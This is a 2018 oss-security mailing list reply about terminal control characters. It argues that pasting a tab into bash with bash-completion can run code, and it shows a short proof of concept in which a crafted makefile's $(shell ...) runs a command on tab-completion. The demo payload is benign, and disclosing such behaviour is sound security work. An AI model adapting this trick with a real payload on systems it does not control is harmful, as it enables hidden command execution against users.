Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Mon, 16 Apr 2018 10:15:00 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Re: Re: Terminal Control Chars

* David A. Wheeler <dwheeler@...eeler.com>, 2018-04-12, 17:18:
>Russ Allbery:
>>I think a useful definition of "control character" in this context 
>>(and I realize this doesn't exactly match the ASCII definition) is a 
>>character that results in an action other than insertion being 
>>taken... CR and LF would not be control characters in that definition, 
>>since they insert a newline and don't cause an action. Similarly, TAB 
>>wouldn't be a control character in that definition.
>
>As you noted, that definition doesn't match the ASCII definition, but I 
>also think it's misleading.  If someone pastes a CR/LF into a shell 
>prompt, it certainly *DOES* cause an action,

Similarly, tab is an "active" character in most shells.

In the worst case (the victim uses bash with bash-completion installed, 
and the attacker has write access to the victim's filesystem), pasting 
tab can be as bad as pasting LF.

Here's a proof of concept:

   $ printf 'x := $(shell (echo; cowsay pwned)>/dev/tty)' > moo
   $ make -f moo <tab>
    _______
   < pwned >
    -------
           \   ^__^
            \  (oo)\_______
               (__)\       )\/\
                   ||----w |
                   ||     ||

Credit for discovering this goes to Dan Rosenberg:
https://twitter.com/djrbliss/status/699363006946344963

-- 
Jakub Wilk

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ